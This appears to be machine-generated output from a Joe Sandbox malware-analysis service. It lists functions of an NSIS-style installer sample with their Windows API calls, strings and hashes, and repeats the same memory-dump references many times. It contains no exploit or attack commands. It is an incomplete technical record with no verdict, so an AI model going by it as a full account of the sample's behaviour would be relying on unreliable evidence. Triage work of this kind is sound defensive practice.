                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                        • String ID: F$A
                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                        Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                        Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425976,74DF23A0,00000000), ref: 00406902
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00425976,74DF23A0,00000000), ref: 00406A73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                        Strings
                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInstance
                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                        Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                        Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                        Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                        Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                        • String ID: F$N$open
                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                        Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
